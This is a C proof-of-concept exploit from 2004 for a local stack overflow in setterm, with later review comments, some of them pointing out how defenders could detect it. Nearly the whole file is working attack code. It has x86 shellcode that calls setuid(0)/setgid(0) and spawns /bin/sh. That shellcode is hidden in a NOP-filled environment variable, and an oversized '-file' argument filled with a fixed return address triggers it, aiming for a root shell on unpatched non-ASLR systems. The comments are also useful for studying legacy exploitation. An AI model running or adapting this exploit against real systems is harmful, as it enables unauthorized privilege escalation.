/***********************************************************************
 *              setterm (All v3rs10nz) Proof of concept Xploit         *
 *                                                                     *
 * Author: Uz4yh4N   Contact: Lord@linuxmail.org                       *
 *                                                                     *
 * Tested Against Slackware and SuSe Distros.                          *
 *                                                                     *
 * The bug was found 20 May 2004 03:35                                 *
 * Gr33t1ngz Efnet folk.                                               *
 * This is a Lame stack overflow  you know. But i think the Setterm    *
 * is an important tool.                                               *
 *                          And SPECIAL thanks to  N4rK07IX            *
 *   Firtina oncesi sessizlik by Uz4yh4N                               *
 ***********************************************************************/




#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>



#define MAXDATA 4000                    // bytes in the argv buffer handed to "-file" (filled with ret)
#define BEEP 1500                       // bytes in the "SEXY=" environment-variable buffer (ybuf)

#define PATH "/usr/bin/setterm" // you can change this for your distro. (absolute path passed to execl)
#define PROG "setterm"                  // argv[0] given to the exec'd binary



 /*
  * Raw payload bytes. main() copies this string verbatim into the tail of
  * the "SEXY=" environment variable, measuring it with strlen(), so an
  * embedded 0x00 byte would truncate it there. The trailing comment on each
  * line is the author's own disassembly of that byte sequence (x86, Linux
  * int $0x80 syscall convention); nothing here validates that the comments
  * and bytes agree.
  *
  * From a detection standpoint this exact byte sequence, and the 0x90
  * filler main() surrounds it with, are what an environment/argv scan at
  * execve time would see.
  */
 char shelltoks[] =

        "\x31\xc0"                      // xor    %eax,%eax
        "\x31\xdb"                      // xor    %ebx,%ebx
        "\x31\xc9"                      // xor    %ecx,%ecx
        "\xb0\x46"                      // mov    $0x46,%al
        "\xcd\x80"                      // int    $0x80


        "\x31\xdb"                      // xor %ebx,%ebx
        "\x89\xd8"                      // mov %ebx,%eax
        "\xb0\x2e"                      // mov $0x2e,%al
        "\xcd\x80"                      // int $0x80


        "\x31\xc0"                      // xor    %eax,%eax
        "\x50"                          // push   %eax
        "\x68\x2f\x2f\x73\x68"          // push   $0x68732f2f
        "\x68\x2f\x62\x69\x6e"          // push   $0x6e69622f
        "\x89\xe3"                      // mov    %esp,%ebx
        "\x8d\x54\x24\x08"              // lea    0x8(%esp,1),%edx
        "\x50"                          // push   %eax
        "\x53"                          // push   %ebx
        "\x8d\x0c\x24"                  // lea    (%esp,1),%ecx
        "\xb0\x0b"                      // mov    $0xb,%al
        "\xcd\x80"                      // int    $0x80


        "\x31\xc0"                      // xor    %eax,%eax
        "\xb0\x01"                      // mov    $0x1,%al
        "\xcd\x80";                     // int    $0x80


/*
 * Entry point (implicit-int, pre-C99 style declaration; no argc/argv).
 *
 * Builds two things and then replaces this process with PATH via execl():
 *   1. ybuf   - a BEEP-byte environment variable "SEXY=..." made of 0x90
 *               filler with shelltoks copied into its last strlen(shelltoks)
 *               bytes. putenv() stores the pointer itself rather than a copy,
 *               so ybuf (a stack array) has to stay alive until execl().
 *   2. buffer - MAXDATA bytes filled with the 4-byte value `ret`, passed as
 *               the single argument of "-file".
 *
 * Returns 0 only if execl() returns something other than -1; on failure it
 * reports errno via perror() and exit(-1)s.
 *
 * NOTE(review): `ret` is computed from a fixed constant, so the construction
 * assumes a fixed, non-randomised 32-bit process layout; stack ASLR and a
 * non-executable stack would be expected to break it. For defenders, an
 * environment variable that is almost entirely 0x90 bytes and a single argv
 * entry of MAXDATA repeated addresses are both visible to execve auditing.
 */
main() 
{


   char buffer[MAXDATA];
   char ybuf[BEEP];

   int i,
    *adr_p;
   printf("--> Setterm local stack overflow Proof of Concept Xploit\n");
   printf("--> Author Uz4yh4N Lord@linuxmail.org\n");
  	
	memset(ybuf,0x90,sizeof(ybuf));                                   // 0x90 filler (x86 NOP) across the whole env buffer
	memcpy(&ybuf[BEEP-strlen(shelltoks)],shelltoks,strlen(shelltoks)); // payload bytes go at the very end of ybuf
	memcpy(ybuf,"SEXY=",5);                                           // prefix NAME= so putenv() treats it as a variable
	putenv(ybuf);                                                      // no copy is made; ybuf must outlive this call

	// Fixed base address minus the path and env-string lengths; only
	// meaningful on a 32-bit layout without randomisation - TODO confirm.
	unsigned long ret = 0xBFFFFFFA - strlen(PATH) - strlen(ybuf);

    printf("--> Ret address at 0x%x\n", ret);   // %x with an unsigned long: width matches only where long is 32 bits
    printf("--> Evil buffer loading\n");

             adr_p = (int *)(buffer);           // walk the char array four bytes at a time through an int *

         for(i=0;i<MAXDATA;i += 4)
	     *adr_p++ = ret;                        // unsigned long -> int store of the same 4-byte pattern

	  // Only returns on failure: perror() then exit(-1). argv is {PROG, "-file", buffer}.
	  if(execl(PATH,PROG,"-file",buffer,NULL)== -1) {
	      perror("execl");
	      exit(-1);
 }


	  return 0;
}
